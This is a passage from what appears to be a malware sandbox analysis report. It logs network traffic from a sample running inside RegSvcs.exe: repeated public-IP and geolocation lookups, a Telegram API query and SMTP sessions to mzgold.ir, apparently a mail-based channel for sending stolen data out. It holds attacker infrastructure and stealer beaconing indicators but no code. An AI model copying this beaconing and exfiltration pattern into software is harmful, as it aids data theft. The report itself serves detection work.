Nov 18, 2024 16:33:06.080975056 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:06.438230991 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:06.438441038 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:06.443440914 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:06.788889885 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:06.789132118 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:06.794756889 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:07.152290106 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:07.152671099 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:07.152744055 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:07.152786970 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:07.152815104 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:07.157893896 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:07.157984018 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:07.158137083 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:07.158147097 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:07.158157110 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:07.522759914 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:07.564198017 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:19.644488096 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:19.649960041 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:19.967376947 CET	587	49850	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:19.969723940 CET	49850	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:19.970628977 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:19.975476980 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:19.975682020 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:22.265938044 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:22.266333103 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:22.271608114 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:22.592123985 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:22.592331886 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:22.597310066 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:22.917278051 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:22.918670893 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:22.924242973 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:23.261889935 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:23.261919022 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:23.261965036 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:23.262064934 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:23.266108990 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:23.271450043 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:23.591202974 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:23.592101097 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:23.598217010 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:23.915966034 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:23.918112040 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:23.923264027 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:24.241951942 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:24.242197990 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:24.247505903 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:24.570763111 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:24.571023941 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:24.576472044 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:24.916310072 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:24.916621923 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:24.921876907 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:25.267899990 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:25.268230915 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:25.273695946 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:25.604499102 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:25.604882002 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:25.604933977 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:25.604959011 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:25.604981899 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:33:25.610861063 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:25.611166954 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:25.611337900 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:25.611557007 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:26.259782076 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:33:26.314300060 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:34:33.113234043 CET	49941	587	192.168.2.7	217.144.107.148
Nov 18, 2024 16:34:33.118474007 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:34:33.438014984 CET	587	49941	217.144.107.148	192.168.2.7
Nov 18, 2024 16:34:33.438704014 CET	49941	587	192.168.2.7	217.144.107.148

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 16:32:29.757762909 CET	58325	53	192.168.2.7	1.1.1.1
Nov 18, 2024 16:32:29.766052961 CET	53	58325	1.1.1.1	192.168.2.7
Nov 18, 2024 16:32:31.021526098 CET	52017	53	192.168.2.7	1.1.1.1
Nov 18, 2024 16:32:31.032677889 CET	53	52017	1.1.1.1	192.168.2.7
Nov 18, 2024 16:32:46.586972952 CET	57279	53	192.168.2.7	1.1.1.1
Nov 18, 2024 16:32:46.594434977 CET	53	57279	1.1.1.1	192.168.2.7
Nov 18, 2024 16:32:53.094607115 CET	63075	53	192.168.2.7	1.1.1.1
Nov 18, 2024 16:32:53.286608934 CET	53	63075	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 18, 2024 16:32:29.757762909 CET	192.168.2.7	1.1.1.1	0x61ab	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:31.021526098 CET	192.168.2.7	1.1.1.1	0xb9e	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:46.586972952 CET	192.168.2.7	1.1.1.1	0xff34	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:53.094607115 CET	192.168.2.7	1.1.1.1	0x4562	Standard query (0)	mzgold.ir	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 18, 2024 16:32:29.766052961 CET	1.1.1.1	192.168.2.7	0x61ab	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 18, 2024 16:32:29.766052961 CET	1.1.1.1	192.168.2.7	0x61ab	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:29.766052961 CET	1.1.1.1	192.168.2.7	0x61ab	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:29.766052961 CET	1.1.1.1	192.168.2.7	0x61ab	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:29.766052961 CET	1.1.1.1	192.168.2.7	0x61ab	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:29.766052961 CET	1.1.1.1	192.168.2.7	0x61ab	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:31.032677889 CET	1.1.1.1	192.168.2.7	0xb9e	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:31.032677889 CET	1.1.1.1	192.168.2.7	0xb9e	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:46.594434977 CET	1.1.1.1	192.168.2.7	0xff34	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 18, 2024 16:32:53.286608934 CET	1.1.1.1	192.168.2.7	0x4562	No error (0)	mzgold.ir		217.144.107.148	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49699	193.122.6.168	80	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 16:32:29.779119968 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 16:32:30.677658081 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f045204ae8e4464ae8aa014d631a8534 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 16:32:30.707180023 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 16:32:30.978821039 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:30 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: a78e305bcf430e4cc132e3a207046e8f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 16:32:31.934933901 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 16:32:32.182148933 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:32 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e90b538cbdf023e1322da339df4ac906 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49702	193.122.6.168	80	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 16:32:33.068366051 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 18, 2024 16:32:33.916315079 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:33 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4f320201945c961fdb7a341638bd4646 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49705	193.122.6.168	80	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 16:32:34.752368927 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 16:32:35.590044022 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:35 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 88abcf7dc8caf090d4bfc0ddf244d593 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49712	193.122.6.168	80	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 16:32:36.412177086 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 16:32:37.257783890 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:37 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 4fbd18758d3d832c2ec73bbfc49e8130 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49724	193.122.6.168	80	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 16:32:38.092452049 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 16:32:40.191843033 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:40 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2fd68cdf694f9d3f9effb6025d4623f6 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49741	193.122.6.168	80	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 16:32:40.974631071 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 16:32:41.838534117 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:41 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 024ffd4fbaea1bcf1f9cc4225c631217 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49756	193.122.6.168	80	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 16:32:43.017920971 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 16:32:43.879396915 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:43 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 997f8c0d39dda534db293815b09fb250 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49769	193.122.6.168	80	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 16:32:44.729645967 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 16:32:45.579652071 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:45 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c7cb99f5b69d574e8e5eb299bd3d2d86 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:31 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 15:32:31 UTC	851	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:31 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 45425 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GEijuWUiwjv7itURatJjWskVpb1UlE%2FzyoQA4Szd1%2F12FiSZLI%2FXqDs11CzBRdU4CV8SC2rTSmwXOOdtNxXNva2D4i3elGXcwLsbT427vKK7nDxEgAZfgphzd7KUJF7pPOcOt%2F9X"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e490382eea7e767-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19011&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152372&cwnd=32&unsent_bytes=0&cid=752433c6c16833c4&ts=236&x=0"
2024-11-18 15:32:31 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:32 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 15:32:33 UTC	845	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 15:32:32 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 45426 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C1s0MCPGCb7Ob%2BX3FXmKz03p7OMgEBzEaKplZ8QP5HTfEowAcNr43lOgSm5oZXKCq5qUEB81BQiaqtF3RCjz826fcLJkH4ATMZfESD8qcmA07K4ayYzt1aS50tlGTrqbD6kpnM55"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e490389ac105206-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18865&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=153438&cwnd=32&unsent_bytes=0&cid=012e7a53ded75571&ts=229&x=0"
2024-11-18 15:32:33 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49704	188.114.97.3	443	7712	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 15:32:34 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
